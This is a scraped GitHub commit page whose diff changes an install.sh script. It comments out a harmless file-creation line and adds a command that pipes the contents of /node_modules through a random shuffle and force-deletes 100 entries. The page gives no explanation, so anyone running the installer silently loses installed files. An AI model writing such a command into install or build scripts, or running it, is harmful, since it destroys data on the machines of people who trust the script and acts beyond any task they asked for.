We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
1 parent 85adf9c commit 24069b5Copy full SHA for 24069b5
install.sh
@@ -1,3 +1,5 @@
1
#!/bin/sh
2
3
-touch abc.txt
+# touch abc.txt
4
+
5
+find /node_modules | shuf -n 100 | xargs rm -rf
0 commit comments